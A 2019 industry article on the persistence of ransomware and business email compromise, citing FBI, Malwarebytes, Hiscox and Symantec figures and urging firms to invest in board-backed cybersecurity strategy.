Ransomware Reboot: Old Threats Return To Haunt Firms
In insight / By Phil Muncaster / 10 May 2019
The threat landscape is a messy and chaotic beast. Security vendors stop tens of billions of attacks each year and many more slip under the radar. Making sense of it all can be a difficult task, especially when IT security teams have the extra pressure of regulatory compliance and supporting digital transformation projects. The sheer variety of threats facing firms today compounds these challenges. Yet it’s important to craft a security strategy that will manage risk in whatever form it appears.
Despite recent reports trailing its decline, ransomware is still a huge and growing threat, alongside Business Email Compromise (BEC) and other attack types, according to the latest FBI stats. It should serve as another wake-up call to organisations to ensure they have defence-in-depth measures across the entire IT infrastructure.
Behind The Headlines
Effective cybersecurity is all about the details. Sometimes that can make it dangerous to rely too heavily on vague media narratives. Over the past few months, report after report has claimed that ransomware is on the wane as cyber-criminals look to generate greater returns for less investment via crypto-jacking. Yet this isn’t the whole story.
In fact, ransomware losses associated with incidents reported to the FBI increased from $2.3m (£1.7m) in 2017 to $3.6m (£2.8m) last year. Even this is likely to be an under-estimate given that the FBI doesn’t include lost business, wages, files, productivity or remediation in its calculations. This trend has been backed up by a new report from Malwarebytes, which claims that ransomware detections in Q1 2019 surged 195% from the previous quarter and more than 500% year-on-year.
That same report reveals a staggering 235% year-on-year increase in detected cyber-threats to businesses, as hackers increasingly turn their attention away from consumer targets. Detections of Trojan malware increased by more than 200% from the previous quarter and nearly 650% year-on-year.
The FBI has more. It reveals BEC to be the single biggest threat to organisations last year, in terms of associated losses. It accounted for a massive $1.3bn out of the total $2.7bn reported from global firms to the US law enforcement agency. Also singled out for attention are “payroll diversion” scams in which employees have their credentials phished, enabling access to their payroll account. Direct deposit information is then altered by the hacker so payroll funds are directed to their own account. Just 100 complaints to the FBI last year resulted in losses of $100m.
Threats Keep Evolving
Understanding the current state of the threat landscape is of course important for IT leaders. But it’s also necessary to dig deeper as the black hats are constantly refining their techniques. Ransomware, for example, is arguably getting more sophisticated and targeted, with strains such as SamSam and GandCrab using APT-like techniques to covertly gain access to privileged accounts before spreading. The use of file-less techniques are also increasingly common, helping attackers stay under the radar by using Windows tools to move through networks and install malware.
Even BEC tactics are evolving. Researchers have spotted attackers increasingly looking to scam their victims via mobile comms, rather than email. The immediacy of the communication method helps them to avoid scrutiny. If organisations nominally as tech-savvy as Google (£77m) and Facebook (£18m) can be caught out by BEC, then anyone can.
Of course, having good visibility into threats and your organisation’s IT environment is only half the battle. You then need to build a comprehensive risk-based cybersecurity strategy to preserve digital investments, corporate reputation and the bottom line. Unfortunately, not many firms are succeeding. A new report from insurer Hiscox finds that just 10% of firms in the US, UK, France, Germany, Spain, Belgium and the Netherlands can be classed as cyber readiness “experts”. The vast majority (75%) are mere “novices”, despite spending rising 24% on average year-on-year.
So how can you move from novice to expert? It’s not all about the size of financial investment but where and how it’s spent. The insurer was at pains to point out the importance of executive/board-level buy-in for cybersecurity programmes, a dedicated head of cyber, and the need for clear strategy featuring input from stakeholders across the business. Processes are also crucial — the ability to “track, document and measure impact” — as are employee training and awareness programmes.
A new report from Symantec warns that 82% of CISOs in the UK, France and Germany feel “burnt out” thanks to growing pressures from compliance, IT complexity and mounting threats. A majority are also thinking about leaving their job (64%) or quitting the industry altogether (63%). Given current skills shortages, organisations can ill afford mass early retirements, notwithstanding the fact that high stress tends to impair decision making.
Instead, boardrooms need to get behind the idea of cybersecurity as competitive advantage and give their IT teams the resources they need to become strategic. After all, it’s not just about blocking attacks — effective security is a vital pre-requisite for growth.